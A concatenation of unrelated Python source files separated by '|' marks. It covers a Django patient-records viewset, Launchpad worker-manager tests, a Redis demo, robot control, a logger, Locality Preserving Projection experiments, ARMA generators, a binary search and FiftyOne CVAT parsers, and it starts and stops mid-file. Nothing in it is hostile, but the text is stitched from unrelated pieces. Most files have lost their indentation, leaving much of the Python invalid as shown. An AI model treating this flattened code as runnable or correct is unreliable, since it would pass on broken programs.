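        print(sample.errormessage)
    else:
        print(sample.senryu)
        print(sample.furigana)
        print(sample.url)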
|
from django_filters import rest_framework as filters
from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.generics import get_object_or_404
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from care.facility.api.mixins import UserAccessMixin
from care.facility.api.serializers.patient import (
FacilityPatientStatsHistorySerializer,
PatientDetailSerializer,
PatientSerializer,
)
from care.facility.api.serializers.patient_consultation import PatientConsultationSerializer
from care.facility.models import Facility, FacilityPatientStatsHistory, PatientConsultation, PatientRegistration
class PatientFilterSet(filters.FilterSet):
phone_number = filters.CharFilter(field_name="phone_number")
class PatientViewSet(UserAccessMixin, viewsets.ModelViewSet):
permission_classes = (IsAuthenticated,)
queryset = PatientRegistration.objects.filter(deleted=False)
serializer_class = PatientSerializer
filter_backends = (filters.DjangoFilterBackend,)
filterset_class = PatientFilterSet
def get_serializer_class(self):
if self.action == "retrieve":
return PatientDetailSerializer
elif self.action == "history":
return PatientConsultationSerializer
else:
return self.serializer_class
def get_queryset(self):
if self.request.user.is_superuser:
return self.queryset
return self.queryset.filter(created_by=self.request.user)
@action(detail=True, methods=["get"])
def history(self, request, *args, **kwargs):
user = request.user
queryset = PatientConsultation.objects.filter(patient__id=self.kwargs.get("pk"))
if not user.is_superuser:
queryset = queryset.filter(patient__created_by=user)
return Response(data=self.get_serializer_class()(queryset, many=True).data)
class FacilityPatientStatsHistoryFilterSet(filters.FilterSet):
entry_date = filters.DateFromToRangeFilter(field_name="entry_date")
class FacilityPatientStatsHistoryViewSet(viewsets.ModelViewSet):
permission_classes = (IsAuthenticated,)
queryset = FacilityPatientStatsHistory.objects.all().order_by("-entry_date")
serializer_class = FacilityPatientStatsHistorySerializer
filter_backends = (filters.DjangoFilterBackend,)
filterset_class = FacilityPatientStatsHistoryFilterSet
http_method_names = ["get", "post", "delete"]
def get_queryset(self):
queryset = super().get_queryset()
return queryset.filter(facility_id=self.kwargs.get("facility_pk"))
def get_object(self):
return get_object_or_404(self.get_queryset(), id=self.kwargs.get("pk"))
def get_facility(self):
facility_qs = Facility.objects.filter(pk=self.kwargs.get("facility_pk"))
        if not self.request.user.is_superuser:
            # filter() returns a new queryset, so the result must be reassigned
            facility_qs = facility_qs.filter(created_by=self.request.user)
return get_object_or_404(facility_qs)
def perform_create(self, serializer):
return serializer.save(facility=self.get_facility())
def list(self, request, *args, **kwargs):
"""
Patient Stats - List
Available Filters
        - entry_date_after: date in YYYY-MM-DD format, inclusive of this date
        - entry_date_before: date in YYYY-MM-DD format, inclusive of this date
"""
return super(FacilityPatientStatsHistoryViewSet, self).list(request, *args, **kwargs)
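# A minimal routing sketch (an assumption, not taken from the original project): the URL
# prefix and basename below are illustrative. FacilityPatientStatsHistoryViewSet is not
# registered here because it expects a facility-scoped route that supplies the
# "facility_pk" URL kwarg (for example via drf-nested-routers).
from rest_framework.routers import DefaultRouter
patient_router = DefaultRouter()
patient_router.register(r"patients", PatientViewSet, basename="patient")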
|
# Copyright 2020 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for launchpad.launch.worker_manager."""
import os
import signal
import threading
import time
from absl.testing import absltest
from launchpad.launch import worker_manager
import mock
class WorkerManagerTest(absltest.TestCase):
def setUp(self):
super().setUp()
self._sigterm_patcher = mock.patch.object(
signal, 'SIGTERM', new=signal.SIGUSR1)
self._sigterm_patcher.start()
self._sigint_patcher = mock.patch.object(
signal, 'SIGINT', new=signal.SIGUSR2)
self._sigint_patcher.start()
self._manager = worker_manager.WorkerManager()
self.addCleanup(self._manager.cleanup_after_test, self)
def tearDown(self):
self._sigterm_patcher.stop()
self._sigint_patcher.stop()
super().tearDown()
def test_wait_for_stop(self):
def waiter():
self._manager.wait_for_stop()
self._manager.thread_worker('worker', waiter)
os.kill(os.getpid(), signal.SIGTERM)
def test_slow_termination(self):
def waiter():
self._manager.wait_for_stop()
time.sleep(1)
self._manager.thread_worker('worker', waiter)
os.kill(os.getpid(), signal.SIGTERM)
def test_system_exit(self):
def waiter():
try:
while True:
time.sleep(0.1)
except SystemExit:
pass
self._manager.thread_worker('worker', waiter)
os.kill(os.getpid(), signal.SIGTERM)
def test_stop_and_wait(self):
def waiter():
self._manager.wait_for_stop()
self._manager.thread_worker('worker1', waiter)
self._manager.thread_worker('worker2', waiter)
self._manager.thread_worker('worker3', waiter)
self._manager.stop_and_wait()
def test_failure_wait(self):
def waiter():
self._manager.wait_for_stop()
def failure():
raise Exception('Error')
self._manager.thread_worker('waiter', waiter)
self._manager.thread_worker('failure', failure)
with self.assertRaisesRegexp(
Exception, 'Error'):
self._manager.wait(['waiter'])
self._manager.wait()
def test_return_on_first_completed(self):
def waiter():
self._manager.wait_for_stop()
def worker():
pass
self._manager.thread_worker('waiter', waiter)
self._manager.thread_worker('worker', worker)
self._manager.wait(return_on_first_completed=True)
def test_dont_raise_error(self):
def failure():
raise Exception('Error')
self._manager.thread_worker('failure', failure)
self._manager.wait(raise_error=False)
with self.assertRaisesRegexp(
Exception, 'Error'):
self._manager.wait()
def test_process_worker_stop(self):
self._manager.process_worker('sleep', ['sleep', '3600'])
self._manager.stop_and_wait()
def test_process_worker_failure(self):
self._manager.process_worker('failure', ['cat', 'missing_file'])
with self.assertRaisesRegexp(
RuntimeError, 'One of the workers failed.'):
self._manager.wait()
if __name__ == '__main__':
absltest.main()
|
import redis
# Connect to a local Redis server (default port, database 0).
r = redis.Redis(host='localhost', port=6379, db=0)
# Set and read back a simple key; redis-py returns values as bytes (b'bar').
r.set('foo', 'bar')
x = r.get('foo')
print(x)
# Use the returned bytes value as a key for a second set/get round trip.
r.set(x, 'baz')
x = r.get(x)
print(x)
|
from dynamic_graph.sot.torque_control.control_manager import ControlManager
from dynamic_graph.sot.torque_control.tests.robot_data_test import initRobotData
from numpy import array, ones, zeros
# Instantiate the control manager
cm = ControlManager("cm_test")
q = zeros(initRobotData.nbJoints + 6)
dq = zeros(initRobotData.nbJoints)
bemfFactor = ones(initRobotData.nbJoints)
max_current = 30.0 * ones(initRobotData.nbJoints)
max_tau = 100.0 * ones(initRobotData.nbJoints)
percentageDriverDeadZoneCompensation = 20.0 * ones(initRobotData.nbJoints)
signWindowsFilterSize = ones(initRobotData.nbJoints)
tau = 100.0 * ones(initRobotData.nbJoints)
tau_predicted = 110.0 * ones(initRobotData.nbJoints)
pwmDes = 100.0 * ones(initRobotData.nbJoints)
currentDes = 100.0 * ones(initRobotData.nbJoints)
cm.controlDT = 0.005
# Initializing the input ports
# Setting the robot configuration
cm.add_signals()
cm.i_max.value = max_current
cm.u_max.value = max_tau
cm.tau.value = tau
cm.tau_predicted.value = tau_predicted
cmInitRobotData = initRobotData()
cmInitRobotData.init_and_set_controller_manager(cm)
# Specify control mode ##
# Add position mode
cm.addCtrlMode("pos")
# Add torque mode
cm.addCtrlMode("torque")
cm.add_signals()
cm.ctrl_torque.value = array(currentDes)
cm.ctrl_pos.value = pwmDes
cm.setCtrlMode("all", "pos")
|
from .Node import Node
from Utils.config import *
from Utils.constants import *
class LoopNode(Node):
def __init__(self, depth, node_type, anchor):
super().__init__(depth, node_type, anchor.get_regex())
self.go_back = anchor.is_goback_anchor()
def __str__(self):
return f"Node {self.type} (simple) to {self.label}"
def is_goback_node(self):
return self.go_back
def is_control(self):
return False
def is_multiple_labels(self):
return False
def is_label(self):
return False
def add_child(self, node, match=False):
if self.is_label():
if node.get_type() != NODE_LABEL and not self.is_goback_node(): # We don't want the child
return
elif self.is_control():
if not match:
return
super().add_child(node)
def is_complete(self):
if self.go_back:
return len(self.childs) == 2 #One child is the next node, one because of the loop
else:
return len(self.childs) == 1
def go_back_label(self):
if self.go_back:
return self.label
|
'''
Author: W.R. Jackson, Damp Lab 2020
'''
import datetime
import logging
import sys
import colorama
class SingletonBaseClass(type):
_instances = {}
def __call__(cls, *args, **kwargs):
"""
Possible changes to the value of the `__init__` argument do not affect
the returned instance.
"""
if cls not in cls._instances:
instance = super().__call__(*args, **kwargs)
cls._instances[cls] = instance
return cls._instances[cls]
class BLogger(metaclass=SingletonBaseClass):
'''
Simple Custom Logger to enable colorized text output as well as
discrete control over setting logging levels for debugging.
'''
def __init__(self):
logging.basicConfig(
filename=f'beholder_{datetime.datetime.now().isoformat()}.log',
format='[%(asctime)s] [%(levelname)s] %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.DEBUG,
)
logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
self.log = logging.getLogger(__name__)
self.log.setLevel(logging.INFO)
# This only performs any kind of action on a windows machine,
# otherwise it's a no-op.
colorama.init(autoreset=True)
# def write_out(self, output_fp: str):
# self.log.()
    def change_logging_level(self, logging_level: str):
        '''
        Sets the logger's level by name.
        Args:
            logging_level: one of DEBUG, INFO, WARNING, ERROR, or CRITICAL
                (case-insensitive).
        Returns:
            None
        '''
        logging_level = logging_level.upper()
        if logging_level == "DEBUG":
            self.log.setLevel(logging.DEBUG)
        elif logging_level == "INFO":
            self.log.setLevel(logging.INFO)
        elif logging_level == "WARNING":
            self.log.setLevel(logging.WARNING)
        elif logging_level == "ERROR":
            self.log.setLevel(logging.ERROR)
        elif logging_level == "CRITICAL":
            self.log.setLevel(logging.CRITICAL)
        else:
            print(
                f'Unable to recognize passed in logging level {logging_level}'
            )
def debug(self, message: str):
        '''
        Logs a message at DEBUG level.
        Args:
            message: the message to log.
        Returns:
            None
        '''
self.log.debug(
f'{message}'
)
def info(self, message: str):
        '''
        Logs a message at INFO level.
        Args:
            message: the message to log.
        Returns:
            None
        '''
self.log.info(
f'{message}'
)
def warning(self, message: str):
        '''
        Logs a message at WARNING level.
        Args:
            message: the message to log.
        Returns:
            None
        '''
self.log.warning(
f'{message}'
)
def error(self, message: str):
        '''
        Logs a message at ERROR level.
        Args:
            message: the message to log.
        Returns:
            None
        '''
self.log.error(
f'{message}'
)
def critical(self, message: str):
        '''
        Logs a message at CRITICAL level.
        Args:
            message: the message to log.
        Returns:
            None
        '''
# Magenta is the most ominous color.
self.log.critical(
f'{message}'
)
def damp_themed(self, message: str):
        '''
        Logs a message at INFO level using the DAMP-themed output.
        Args:
            message: the message to log.
        Returns:
            None
        '''
self.log.info(
f'{message}'
)
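# A minimal usage sketch (not part of the original module); the level and messages are
# illustrative only.
if __name__ == '__main__':
    log = BLogger()
    log.change_logging_level('debug')
    log.debug('debug message')
    log.info('info message')
    log.warning('warning message')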
|
'''
Created on 2013/04/25
@author: duongnt
'''
import numpy as np
from scipy.linalg import eig
from scipy import spatial # for kdtree
import matplotlib.pyplot as plt
from sklearn.metrics.pairwise import euclidean_distances
from sklearn.decomposition import PCA
from mpl_toolkits.mplot3d import Axes3D
def loadData(filename):
""" Load data from file.
Returns:
-------------------
Data matrix X of size n x d
n: the number of samples
d: the dimensionality of data sample.
"""
X = []
with open(filename, 'rt') as fin:
for line in fin:
row = map(float, line.strip().split(','))
X.append(row)
X = np.asarray(X, dtype='float64')
return X
def plotData(data, figname):
""" Plot data and save the figure in file.
Args:
--------------
data: n x d matrix (ndarray)
figname: figure file name
"""
d = data.shape[1]
assert d <= 3, "Up to 3D data!"
if d == 2: # 2D
plt.scatter(data[:,0], data[:,1], c='r', marker='x', label='2-dim')
plt.legend(loc='best', prop={'size':20})
plt.axis('equal')
plt.savefig(figname)
elif d == 3: # 3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot(data[:,0], data[:,1], data[:,2], 'rx', label='3-dim')
ax.legend(loc='best', prop={'size':20})
ax.view_init(50,80) # view angle
plt.savefig(figname)
else:
pass
def sqDist(X):
""" Compute the pair-wise distance matrix between row vectors of X (samples).
Args:
------------------
X: n x d matrix of n samples
Returns:
--------------------
sqD of size n x n, where sqD_{i,j} = || xi - xj ||^2
"""
n = X.shape[0] # number of samples
tX = X.T # tX has size d x n
sq = np.sum(tX**2, axis=0)
A = np.tile(sq, (n,1))
B = A.T
C = np.dot(X, tX)
sqD = A + B - 2*C
return sqD
def sqDist2(X):
""" Compute the pair-wise distance matrix between row vectors of X,
using sklearn.metrics.pairwise.euclidean_distances.
Args:
-----------
X: n x d
Returns:
------------
sqD of size n x n, where sqD_{i,j} = || xi - xj ||^2
"""
return euclidean_distances(X, X, squared=True)
def dist_based_sim(X, gamma=0.5):
""" Construct distance-based similarity matrix W.
W_ij = exp(-|| xi - xj ||^2 / (gamma^2)).
By using square distance matrix sqD above, we can compute W easily.
Args:
--------------------------------
X: n x d matrix of n samples
gamma: tuning parameter > 0
Returns:
----------------------------------------
Similarity matrix W of size n x n
"""
sqD = sqDist2(X)
W = np.exp(-sqD/(gamma**2))
return W
def local_scaling_based_sim(X, kv=7):
""" Compute distance-based similarity matrix,
using local scaling heuristic.
See L. Zelnik-Manor & P. Perona, Self-tuning spectral clustering,
Advances in NIPS 17, 1601-1608, MIT Press, 2005 for heuristically choosing k value.
"""
tree = spatial.KDTree(X) # use KDTree for knn fast queries.
n = X.shape[0]
gammas = []
for i in range(n):
gammas.append(tree.query(X[i], k=kv)[0][-1]) # compute the distance btw X[i] and its k-th nearest neighbor
gammas = np.asarray(gammas, dtype='float64')
localMat = np.dot(gammas.reshape(n,1), gammas.reshape(1,n)) # localMat[i,j] = gamma_i x gamma_j
sqD = sqDist2(X)
W = np.exp(-sqD/localMat)
return W
def knn_based_sim(X, kv=7):
""" Compute k-nearest-neighbor-based similarity matrix W
Args:
---------
X: n x d matrix of n samples
kv: k value in knn.
Returns:
W: n x n matrix, where
W_{i,j} = 1 if x_i is knn of x_j or x_j is knn of x_i
W_{i,j} = 0, otherwise.
"""
tree = spatial.KDTree(X)
n = X.shape[0]
knn_idx = []
for i in range(n):
knn_idx.append(tree.query(X[i], k=kv)[1])
W = np.zeros((n,n), dtype='int')
for i in range(n):
for j in range(i,n):
if (i in knn_idx[j]) or (j in knn_idx[i]):
W[i,j] = W[j,i] = 1
return W
def lpp(X, W):
""" Locality Preserving Projection (LPP).
Args:
X: data matrix of size n x d (n samples, dimensionality d)
W: similarity(affinity) matrix of size n x n (pair-wise similarities matrix)
Returns:
B = [y1|y2|...|ym] of size d x m, where:
y1(e1), y2(e2),...ym(em) are solutions (eigenvector,eigenvalue)
of a generalized eigenvalue problem: X L tX y = e X D tX y
and e1 <= e2 <= .... <= em (the m smallest eigenvalues).
"""
D = np.diag(np.sum(W, axis=1))
L = D - W # construct graph-Laplacian matrix
def matprod(*args):
return reduce(np.dot, args)
A = matprod(X.T, L, X)
B = matprod(X.T, D, X)
#d = B.shape[0]
#Id = np.eye(d)
    evals, V = eig(A, B)  # eigenvalues are NOT returned in any particular order; y_i = V[:,i] = i-th column of V
    # Sort the eigenpairs by increasing eigenvalue
sorted_indices = np.argsort(evals)
V = V[:,sorted_indices]
return evals, V
def lpp_transform(X, V, ncomp=2):
"""
Args:
--------------
X: n x d. Data matrix
V: d x m. Each column of V is a LPP direction.
ncomp (<= m <= d): The dimension of transformed data
Returns:
--------------
tr_X: n x ncomp
"""
_, m = V.shape
if ncomp > m:
ncomp = m
tr_X = np.dot(X, V[:,0:ncomp])
return tr_X
def main(X, figname, sim_type='dist_based'):
""" Main program: Locality Preserving Projection Algorithm
Args:
-----------
X: n x d matrix of n samples.
figname: filename to save a plot figure.
sim_type: similarity matrix type,
'dist_based' for distance based similarity
'local_scaling' for local scaling based similarity
'knn' for knn based similarity.
"""
if sim_type == 'dist_based':
W = dist_based_sim(X, gamma=0.5)
elif sim_type == 'local_scaling':
W = local_scaling_based_sim(X, kv=7)
elif sim_type == 'knn':
W = knn_based_sim(X, kv=50)
else:
        raise ValueError("Invalid similarity type!")
_, V = lpp(X, W)
xmean = np.mean(X, axis=0)
pca = PCA(n_components=2, whiten=True).fit(X)
pmean = pca.mean_
pcs = pca.components_
def plot_pca_dir(pc):
plt.plot([k*pc[0]+pmean[0] for k in np.linspace(-0.5,0.5)],
[k*pc[1]+pmean[1] for k in np.linspace(-0.5,0.5)],
'm-', lw=4, label='PCA')
def plot_lpp_dir(direction):
""" Plot LPP direction. """
plt.plot([xmean[0]+k*direction[0] for k in np.linspace(-0.8,0.8)],
[xmean[1]+k*direction[1] for k in np.linspace(-0.8,0.8)],
'g-', lw=4, label='LPP')
first_dir = V[:,0]
fig = plt.figure()
fig.clf()
#plt.scatter(X[:,0], X[:,1], c='r', marker='x', label='original data')
plt.scatter(X[:,0], X[:,1], c='r', marker='x')
plot_pca_dir(pcs[0])
plot_lpp_dir(first_dir)
plt.legend(loc='best', prop={'size':20})
plt.axis('equal')
plt.savefig(figname)
def lpp_for_4d_data(filename='4d-x.txt'):
X = []
with open(filename, 'r') as fin:
for line in fin:
X.append(map(float, line.strip().split(',')))
X = np.asarray(X, dtype='float64')
#W = knn_based_sim(X, kv=2)
#W = dist_based_sim(X, gamma=0.5)
W = local_scaling_based_sim(X, kv=7)
_, V = lpp(X, W)
trX = lpp_transform(X, V, ncomp=2)
plotData(trX, figname='local7-lpp-4dto2d.eps')
def lpp4Iris():
from sklearn.datasets import load_iris
iris = load_iris()
X = iris.data
Y = iris.target
cs = ['b', 'g', 'r']
ms = ['+', 'o', 'x']
lb = ['setosa', 'versicolor', 'virginica']
k = 5
ncomp = 2
#W = local_scaling_based_sim(X, kv=k)
W = knn_based_sim(X, kv=k)
_, V = lpp(X, W)
trX = lpp_transform(X, V, ncomp=ncomp)
fig = plt.figure()
fig.clf()
if ncomp == 3:
ax = fig.add_subplot(111, projection='3d')
for i in range(3):
            ax.plot(trX[Y==i,0], trX[Y==i,1], trX[Y==i,2], cs[i]+ms[i], label=lb[i])
ax.view_init(50, 70)
plt.legend(loc='best', prop={'size':20})
#plt.savefig('3d/local-%dnn-iris-3d.eps' % k)
plt.savefig('3d/%dnn-iris-3d.png' % k)
elif ncomp == 2:
for i in range(3):
plt.plot(trX[Y==i,0], trX[Y==i,1], cs[i]+ms[i], label=lb[i])
plt.legend(loc='best', prop={'size':20})
#plt.savefig('2d/local-%dnn-iris-2d.eps' % k)
plt.savefig('2d/%dnn-iris-2d.png' % k)
else:
pass
def lpp4Digits():
from sklearn.datasets import load_digits
digit = load_digits(3)
X = digit.data
Y = digit.target
lb = ['0', '1', '2']
cs = ['b', 'g', 'r']
ms = ['+', 'o', 'x']
ncomp = 2
#W = knn_based_sim(X, kv=7)
W = local_scaling_based_sim(X, kv=20)
_, V = lpp(X, W)
tr_data = lpp_transform(X, V, ncomp=ncomp)
fig = plt.figure()
fig.clf()
if ncomp == 2:
for i in range(3):
plt.plot(tr_data[Y==i,0], tr_data[Y==i,1], cs[i]+ms[i], label=lb[i])
plt.legend(loc='best', prop={'size':20})
plt.savefig('lpp-digit-2d.png')
elif ncomp == 3:
ax = fig.add_subplot(111, projection='3d')
for i in range(3):
ax.plot(tr_data[Y==i,0], tr_data[Y==i,1], tr_data[Y==i,2], cs[i]+ms[i], label=lb[i])
ax.legend(loc='best', prop={'size':20})
ax.view_init(50, 70)
plt.savefig('lpp-digit-3d.png')
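# A small self-contained sketch (not part of the original experiments): run LPP on
# synthetic 2D Gaussian data with a distance-based similarity matrix. The parameter
# values are illustrative only.
def lpp_synthetic_demo():
    rng = np.random.RandomState(0)
    X = rng.multivariate_normal([0.0, 0.0], [[3.0, 1.0], [1.0, 0.5]], size=200)
    W = dist_based_sim(X, gamma=0.5)
    _, V = lpp(X, W)
    trX = lpp_transform(X, V, ncomp=1)
    print(trX.shape)  # (200, 1)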
if __name__ == '__main__':
#X = loadData('2d-2.txt')
#plotData(X, 'original-2d-1.png')
#main(X, 'knn_based_lpp_2d_1.eps', sim_type='knn')
#main(X, '2d_2.eps', sim_type='knn')
#lpp_for_4d_data()
lpp4Iris()
|
import numpy as np
class ARMA:
"""Class that generates WN, AR, MA and ARMA processes."""
@staticmethod
def generate_wn(n, sigma=1):
"""Generates a white noise series.
The code follows:
y_{t} = \epsilon_{t}
Args:
n: length of the series.
sigma: standard deviation of the innovations.
Returns:
np.Array with the series.
"""
return np.random.normal(0, sigma, size=n)
@staticmethod
def generate_ma(n, thetas, mu, sigma=1):
"""Generates a moving average series.
The code follows:
y_{t} = \mu + \epsilon_{t} + \theta_{1}\epsilon_{t-1} + \theta_{2}\epsilon_{t-2} + ... + \theta_{q}\epsilon_{t-q}
Args:
n: length of the series.
thetas: list of thetas, in the order \theta_{1}, \theta_{2}, ..., \theta_{q}.
mu: base constant.
sigma: standard deviation of the innovations (optional).
Returns:
np.Array with the series.
"""
q = len(thetas)
adj_n = n + q # We add q values because at the beginning we have no thetas available.
e_series = ARMA.generate_wn(adj_n, sigma) # Generating a white noise.
ma = []
for i in range(1, adj_n):
visible_thetas = thetas[0:min(q, i)] # At first, we only "see" some of the thetas.
visible_e_series = e_series[i - min(q, i):i] # The same happens to the white noise.
reversed_thetas = visible_thetas[::-1]
try: # Getting e_t if we can.
e_t = visible_e_series[-1]
except IndexError:
e_t = 0
# Main equation.
ma_t = mu + e_t + np.dot(reversed_thetas, visible_e_series)
ma.append(ma_t)
ma = ma[max(q-1, 0):] # Dropping the first values that did not use all the thetas.
return ma
@staticmethod
def generate_ar(n, phis, sigma=1):
"""Generates an autoregressive series.
The code follows:
y_{t} = \phi_{1} y_{t-1} + \phi_{2} y_{t-2} + ... + \phi_{p} y_{t-p} + \epsilon_{t}
Args:
n: length of the series.
            phis: list of phis, in the order \phi_{1}, \phi_{2}, ..., \phi_{p}.
sigma: standard deviation of the innovations (optional).
Returns:
np.Array with the series.
"""
p = len(phis)
        adj_n = n + p  # We add p values because at the beginning we have no phis available.
e_series = ARMA.generate_wn(adj_n, sigma) # Generating a white noise.
ar = [e_series[0]] # We start the series with a random value
for i in range(1, adj_n):
visible_phis = phis[0:min(p, i)] # At first, we only "see" some of the phis.
visible_series = ar[i - min(p, i):i] # The same happens to the white noise.
reversed_phis = visible_phis[::-1]
# Main equation.
ar_t = e_series[i] + np.dot(reversed_phis, visible_series)
ar.append(ar_t)
ar = ar[p:] # Dropping the first values that did not use all the phis.
return ar
@staticmethod
def generate_arma(n, phis, thetas, mu, sigma=1):
"""Generates an autoregressive moving average series.
The code follows:
y_{t} = \mu + \phi_{1} y_{t-1} + \phi_{2} y_{t-2} + ... + \phi_{p} y_{t-p} + \epsilon_{t} + \theta_{1}\epsilon_{t-1} + \theta_{2}\epsilon_{t-2} + ... + \theta_{q}\epsilon_{t-q}
Args:
n: length of the series.
            phis: list of phis, in the order \phi_{1}, \phi_{2}, ..., \phi_{p}.
thetas: list of thetas, in the order \theta_{1}, \theta_{2}, ..., \theta_{q}.
mu: base constant.
sigma: standard deviation of the innovations (optional).
Returns:
np.Array with the series.
"""
p = len(phis)
q = len(thetas)
adj_n = n + max(p, q) # We use max to make sure we cover the lack of coefficients.
        e_series = ARMA.generate_wn(adj_n, sigma)  # Base white noise with the requested sigma.
arma = [e_series[0]] # We start the series with a random value (same as AR).
for i in range(1, adj_n):
visible_phis = phis[0:min(p, i)]
visible_thetas = thetas[0:min(q, i)]
reversed_phis = visible_phis[::-1]
reversed_thetas = visible_thetas[::-1]
visible_series = arma[i - min(p, i):i]
visible_e_series = e_series[i - min(q, i):i]
try: # Getting e_t if we can.
e_t = visible_e_series[-1]
except IndexError:
e_t = 0
# Main equation.
            ar_t = np.dot(reversed_phis, visible_series)
ma_t = mu + e_t + np.dot(reversed_thetas, visible_e_series)
arma_t = ar_t + ma_t
arma.append(arma_t)
arma = arma[max(p, q):] # Dropping the first values that did not use all the phis or thetas.
return arma
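# A short usage sketch (not part of the original class); the coefficients and lengths
# below are illustrative only.
if __name__ == '__main__':
    np.random.seed(0)
    wn = ARMA.generate_wn(200)
    ma = ARMA.generate_ma(200, thetas=[0.6, 0.3], mu=0.0)
    ar = ARMA.generate_ar(200, phis=[0.5, -0.2])
    arma = ARMA.generate_arma(200, phis=[0.5], thetas=[0.4], mu=0.0)
    print(len(wn), len(ma), len(ar), len(arma))  # each series has length 200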
|
""" Implementação do algoritmo de busca binária com recursão """
def busca_binaria(valor, vetor, esquerda, direita):
"""
Implementação de um algoritmo de busca binária com recursão.
Argumentos:
valor: Any. Valor a ser buscado na lista
vetor: list. lista ordenada na qual o valor será buscado
esquerda: Any. Valor inicial da metade buscada
direita: Any. Valor final da metade buscada
Retorna o índice do valor em "vetor" ou -1 caso não exista nela.
"""
meio = int((esquerda + direita) / 2)
if esquerda <= direita:
if valor > vetor[meio]:
esquerda = meio + 1
return busca_binaria(valor, vetor, esquerda, direita)
elif valor < vetor[meio]:
direita = meio - 1
return busca_binaria(valor, vetor, esquerda, direita)
return meio
return -1
lista = [0, 1, 3, 5, 6, 7, 8, 9, 10, 11, 12]
print(busca_binaria(12, lista, 0, len(lista) - 1))  # "direita" is an inclusive index, so pass len(lista) - 1
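# An iterative variant for comparison (not part of the original exercise); it uses the
# same inclusive-bounds convention as busca_binaria above.
def busca_binaria_iterativa(valor, vetor):
    """Return the index of "valor" in the sorted list "vetor", or -1 if absent."""
    esquerda, direita = 0, len(vetor) - 1
    while esquerda <= direita:
        meio = (esquerda + direita) // 2
        if valor > vetor[meio]:
            esquerda = meio + 1
        elif valor < vetor[meio]:
            direita = meio - 1
        else:
            return meio
    return -1
print(busca_binaria_iterativa(12, lista))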
|
"""
Utilities for working with datasets in
`CVAT format <https://github.com/opencv/cvat>`_.
| Copyright 2017-2020, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
from collections import defaultdict
from datetime import datetime
import logging
import os
import jinja2
import eta.core.data as etad
import eta.core.image as etai
import eta.core.utils as etau
import fiftyone as fo
import fiftyone.constants as foc
import fiftyone.core.frame as fof
import fiftyone.core.labels as fol
import fiftyone.core.metadata as fom
import fiftyone.core.utils as fou
import fiftyone.utils.data as foud
logger = logging.getLogger(__name__)
class CVATImageSampleParser(foud.LabeledImageTupleSampleParser):
"""Parser for samples in
`CVAT image format <https://github.com/opencv/cvat>`_.
This implementation supports samples that are
``(image_or_path, image_tag_dict)`` tuples, where:
- ``image_or_path`` is either an image that can be converted to numpy
format via ``np.asarray()`` or the path to an image on disk
- ``image_tag_dict`` is a JSON dictionary representation of an
``<image>`` tag of a CVAT image annotations file, which should have
the following format::
{
"@id": "0",
"@name": "filename.jpg",
"@width": "640",
"@height": "480",
"box": [
{
"@label": "car",
"@xtl": "100",
"@ytl": "50",
"@xbr": "325",
"@ybr": "190",
"@occluded": "0",
"attribute": [
{
"@name": "type",
"#text": "sedan"
},
...
]
},
...
],
...
}
For unlabeled images, ``image_tag_dict`` can be ``None``.
See :class:`fiftyone.types.dataset_types.CVATImageDataset` for more format
details.
"""
def __init__(self):
super().__init__()
self._cvat_image_cache = None
@property
def label_cls(self):
return fol.Detections
@property
def has_image_metadata(self):
return True
def get_image_metadata(self):
cvat_image = self._cvat_image
if cvat_image is None:
return None
return cvat_image.get_image_metadata()
def get_label(self):
"""Returns the label for the current sample.
Args:
sample: the sample
Returns:
a :class:`fiftyone.core.labels.Detections` instance, or ``None`` if
the sample is unlabeled
"""
cvat_image = self._cvat_image
if cvat_image is None:
return None
return cvat_image.to_detections()
def clear_sample(self):
super().clear_sample()
self._cvat_image_cache = None
@property
def _cvat_image(self):
if self._cvat_image_cache is None:
self._cvat_image_cache = self._parse_cvat_image()
return self._cvat_image_cache
def _parse_cvat_image(self):
d = self.current_sample[1]
return CVATImage.from_image_dict(d) if d is not None else None
class CVATVideoSampleParser(foud.LabeledVideoSampleParser):
"""Parser for samples in
`CVAT video format <https://github.com/opencv/cvat>`_.
This implementation supports samples that are
    ``(video_path, anno_path)`` tuples, where:
- ``video_path`` is the path to a video on disk
- ``anno_path`` is the path to a CVAT video labels XML file on disk,
or ``None`` for unlabeled videos.
See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for more format
details.
"""
def __init__(self):
super().__init__()
self._objects_field = "objects"
@property
def has_video_metadata(self):
return False
def get_video_path(self):
return self.current_sample[0]
def get_frame_labels(self):
labels_path = self.current_sample[1]
if not labels_path:
return None
_, _, cvat_tracks = load_cvat_video_annotations(labels_path)
return _cvat_tracks_to_frames(cvat_tracks, self._objects_field)
class CVATImageDatasetImporter(foud.LabeledImageDatasetImporter):
"""Importer for CVAT image datasets stored on disk.
See :class:`fiftyone.types.dataset_types.CVATImageDataset` for format
details.
Args:
dataset_dir: the dataset directory
skip_unlabeled (False): whether to skip unlabeled images when importing
shuffle (False): whether to randomly shuffle the order in which the
samples are imported
seed (None): a random seed to use when shuffling
max_samples (None): a maximum number of samples to import. By default,
all samples are imported
"""
def __init__(
self,
dataset_dir,
skip_unlabeled=False,
shuffle=False,
seed=None,
max_samples=None,
):
super().__init__(
dataset_dir,
skip_unlabeled=skip_unlabeled,
shuffle=shuffle,
seed=seed,
max_samples=max_samples,
)
self._data_dir = None
self._labels_path = None
self._info = None
self._images_map = None
self._filenames = None
self._iter_filenames = None
self._num_samples = None
def __iter__(self):
self._iter_filenames = iter(self._filenames)
return self
def __len__(self):
return self._num_samples
def __next__(self):
filename = next(self._iter_filenames)
image_path = os.path.join(self._data_dir, filename)
cvat_image = self._images_map.get(filename, None)
if cvat_image is not None:
# Labeled image
image_metadata = cvat_image.get_image_metadata()
detections = cvat_image.to_detections()
else:
# Unlabeled image
image_metadata = fom.ImageMetadata.build_for(image_path)
detections = None
return image_path, image_metadata, detections
@property
def has_dataset_info(self):
return True
@property
def has_image_metadata(self):
return True
@property
def label_cls(self):
return fol.Detections
def setup(self):
